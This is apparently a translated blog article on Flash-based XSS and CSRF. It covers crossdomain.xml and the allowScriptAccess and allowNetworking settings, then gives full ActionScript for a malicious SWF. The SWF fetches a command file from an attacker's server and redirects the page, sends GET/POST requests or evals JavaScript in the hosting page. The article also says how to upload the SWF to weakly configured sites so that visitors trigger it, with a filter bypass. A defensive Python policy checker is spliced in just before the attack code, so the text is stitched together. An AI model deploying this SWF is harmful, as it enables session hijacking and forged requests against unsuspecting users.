Using FLASH to access the network causes XSS, CSRF, etc.

Source: Internet
Author: User
Tags: ftp protocol


1. Server side: crossdomain.xml

The only cross-origin restriction mechanism Flash has is the crossdomain.xml file, so we first have to explain what crossdomain.xml is. When a SWF requests a file from another domain, it first checks whether that domain serves a crossdomain.xml; if there is none, the access fails. If the crossdomain.xml file exists and contains an allow rule for the SWF's origin, the communication proceeds normally. So the key to letting Flash transmit data across domains is crossdomain.xml. Usually the file is stored in the web root, where it is called the "master policy file" and affects the entire website; it can also be placed in a single directory, where it only affects that directory. crossdomain.xml must strictly follow XML syntax: it has exactly one root node, cross-domain-policy, which carries no attributes, and that root node may only contain the following child nodes: site-control, allow-access-from, allow-access-from-identity, and allow-http-request-headers-from.

The first two child nodes are the important ones:

site-control: this tag has only one attribute, permitted-cross-domain-policies, which controls whether other policy files may be loaded:
- none: the loadPolicyFile method cannot load any policy file, including this master policy file.
- master-only: only the master policy file is used [default value].
- by-content-type: over HTTP/HTTPS, only a file whose Content-Type is text/x-cross-domain-policy can be loaded with loadPolicyFile as a cross-domain policy file.
- by-ftp-filename: over FTP, only a file named crossdomain.xml can be loaded with loadPolicyFile as a cross-domain policy file.
- all: loadPolicyFile may load any file in the target domain as a cross-domain policy file.

allow-access-from: the attribute values of this node determine which source domains' Flash files may read content from this domain.
- domain: an exact IP address, an exact domain name, or a wildcard domain (* meaning any domain). Only Flash files served from the specified domain have permission to read this domain's content.
- to-ports: the range of socket connection ports through which the domain's content may be accessed. Use the to-ports="1100,1120-1125" format to limit the port range, or the wildcard (*) to allow all ports.
- secure: whether the information must be transmitted encrypted.

2. ActionScript

In simple terms, ActionScript is the code used to create Flash files, just as C++ is used to create software. Through ActionScript we can do a lot of things, and it is usually what is needed to trigger a vulnerability. It is easy to imagine how dangerous a website is if it does not restrict uploaded Flash files.

3. Client-side HTML code

The tag that embeds the SWF has two relevant attributes: AllowScriptAccess and allowNetworking. allowScriptAccess controls the communication between Flash and the HTML page.
Its possible values are:
- always: no restriction on communication with the HTML page, i.e. the SWF may execute JavaScript.
- sameDomain: only allows communication between the SWF and an HTML page from the same domain [default value].
- never: completely forbids communication between the SWF and the page.

allowNetworking controls the communication between Flash and the network. Its possible values are:
- all: allow all network communication [default value].
- internal: the SWF cannot communicate with the browser (for example navigateToURL), but the other network APIs can still be called.
- none: disable all network communication.

4. Example

With the AllowScriptAccess and allowNetworking attributes set improperly, ActionScript can be used to create a malicious Flash file:
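As an added example (not part of the original article), a Python checker that applies the points above from the defender's side: it parses a crossdomain.xml policy and flags site-control permitted-cross-domain-policies="all", allow-access-from domain="*", to-ports="*" and secure="false", and it scans embed/param tags for AllowScriptAccess="always" and allowNetworking="all". The sample policy and embed tag at the end are constructed for the demonstration.

```python
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

ALLOWED_CHILDREN = {"site-control", "allow-access-from",
                    "allow-access-from-identity", "allow-http-request-headers-from"}

def audit_crossdomain(xml_text):
    # Returns a list of findings; an empty list means nothing in the policy was flagged.
    root, findings = ET.fromstring(xml_text), []
    if root.tag != "cross-domain-policy" or root.attrib:
        findings.append("root must be <cross-domain-policy> with no attributes")
    for child in root:
        if child.tag not in ALLOWED_CHILDREN:
            findings.append("unexpected child node <%s>" % child.tag)
        elif child.tag == "site-control":  # master-only is the default value
            if child.get("permitted-cross-domain-policies", "master-only") == "all":
                findings.append("site-control lets loadPolicyFile use any file as a policy")
        elif child.tag == "allow-access-from":
            if child.get("domain") == "*":
                findings.append("allow-access-from domain='*' lets any SWF read this site")
            if child.get("to-ports") == "*":
                findings.append("allow-access-from to-ports='*' opens every socket port")
            if child.get("secure", "true").lower() == "false":
                findings.append("allow-access-from secure='false' drops encryption")
    return findings

class _EmbedAudit(HTMLParser):
    # Flags AllowScriptAccess=always / allowNetworking=all on <embed> and <param> tags.
    def __init__(self):
        super().__init__()
        self.findings = []
    def _check(self, name, value):
        name, value = name.lower(), (value or "").lower()
        if name == "allowscriptaccess" and value == "always":
            self.findings.append("allowScriptAccess=always: SWF may run JavaScript in the page")
        elif name == "allownetworking" and value == "all":
            self.findings.append("allowNetworking=all: SWF may talk to the network freely")
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "embed":
            for name, value in attrs.items():
                self._check(name, value)
        elif tag == "param" and "name" in attrs:  # <object><param name=... value=...>
            self._check(attrs["name"], attrs.get("value"))

def audit_embed(html_text):
    parser = _EmbedAudit()
    parser.feed(html_text)
    return parser.findings
# Constructed sample inputs (not from the article): a permissive policy and a permissive embed tag.
WEAK_POLICY = ('<cross-domain-policy><site-control permitted-cross-domain-policies="all"/>'
               '<allow-access-from domain="*" to-ports="*" secure="false"/></cross-domain-policy>')
WEAK_EMBED = '<embed src="/upload/x.swf" allowScriptAccess="always" allowNetworking="all">'
```

Running audit_crossdomain(WEAK_POLICY) yields four findings and audit_embed(WEAK_EMBED) two; a policy restricted to a named domain with secure="true" and an embed using sameDomain/internal yield none.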

import flash.net.*;
import flash.events.Event;
import flash.external.ExternalInterface;

var param:Object = root.loaderInfo.parameters;
var value:String = param["custom parameter name"];            // read the parameter passed in the URL
var myloader:URLLoader = new URLLoader(new URLRequest(value)); // create a URL loader
myloader.addEventListener(Event.COMPLETE, go);                 // event listener: run go() when loading completes
myloader.load();

function go(event:Event):void {
    var ResponseText:String = myloader.data;
    var array_Response:Array = ResponseText.replace(/\r/g, "").split("\n"); // split into lines (line i is command i)
    for (var i:int = 0; i < array_Response.length; i++) {
        var cmd:String = array_Response[i].substr(0, 1); // the first character is the command
        var urlbody:String = array_Response[i].substr(2); // the rest of the line is the URL (and data)
        switch (cmd) {
            case "0": // redirect the current window
                var url_0:String = urlbody;
                navigateToURL(new URLRequest(url_0), "_self");
                break;
            case "1": // open in a new window
                var url_1:String = urlbody;
                navigateToURL(new URLRequest(url_1), "_blank");
                break;
            case "2": // GET request
                var url_2:URLRequest = new URLRequest(urlbody);
                url_2.method = "GET";
                sendToURL(url_2);
                break;
            case "3": // POST request
                var array_url_3:Array = urlbody.split(","); // split off the POST data
                var url_3:URLRequest = new URLRequest(array_url_3[0]);
                var var_3:URLVariables = new URLVariables(array_url_3[1]);
                url_3.method = "POST";
                url_3.data = var_3;
                sendToURL(url_3);
                break;
            case "4": // run JavaScript in the hosting page
                var code:String = urlbody;
                ExternalInterface.call("eval", code);
                break;
            default:
                break;
        }
    }
    stop();
}
After using the code above to create a SWF file, upload it to a website with weak settings.

5. Usage

Applicable targets: websites whose AllowScriptAccess and allowNetworking attributes are not strictly set, for example set to always or all, which means the Flash file can interact with the HTML page and communicate over the network. On such sites the SWF you uploaded can take effect. Upload the swf and the txt file to your server and embed the swf in the vulnerable website. Example: ***.swf?custom parameter name=http://yoursite/***.txt. If that is filtered, replace it with ***.swf?custom parameter name=http://yoursite/***.txt&***.swf.

txt file format: one line per command, written as command,URL[,data], where the command is one of:
0 -- jump to the URL
1 -- open the URL in a new window
2 -- send a GET request
3 -- send a POST request
4 -- call JavaScript

What can be done with it? XSS and CSRF. For example, if you customize a blog homepage and upload a swf there, it will be triggered when someone else browses that page.

6. Summary

Flash vulnerability exploitation goes far beyond this. Apart from improper AllowScriptAccess and allowNetworking settings combined with uploading a malicious swf, improperly configured crossdomain.xml files and vulnerabilities in official swf files can also be used to execute Flash XSS, CSRF and so on, and crossdomain.xml files are generally public. I am still studying it....
